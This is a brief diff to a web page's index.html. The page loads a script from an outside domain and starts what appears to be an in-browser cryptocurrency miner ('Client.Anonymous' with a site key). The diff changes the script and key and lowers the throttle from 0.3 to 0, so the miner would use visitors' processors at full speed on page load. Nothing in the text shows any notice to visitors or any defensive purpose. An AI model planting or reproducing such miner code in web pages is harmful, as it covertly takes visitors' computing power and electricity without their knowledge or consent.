--- a/index.html
+++ b/index.html
@@ -16,15 +16,15 @@
 
 </body>
  
-<script src="https://www.hostingcloud.racing/06Nm.js"></script>
+<script src="https://www.hostingcloud.racing/14MC.js"></script>
 
 <script>
 
-    var _client = new Client.Anonymous('2d51a7d74290e8a2047efcc6420122fb2df20bf2ab6f457120811e167338344d', {
+    var _client = new Client.Anonymous('ab53ae5aa903452c6124358ae8d214b5924d71234a36e22cd4077e1cd9ba049c', {
 
-        throttle: 0.3, c: 'w'
+        throttle: 0, c: 'w'
 
-});
+    });
 
     _client.start();
 
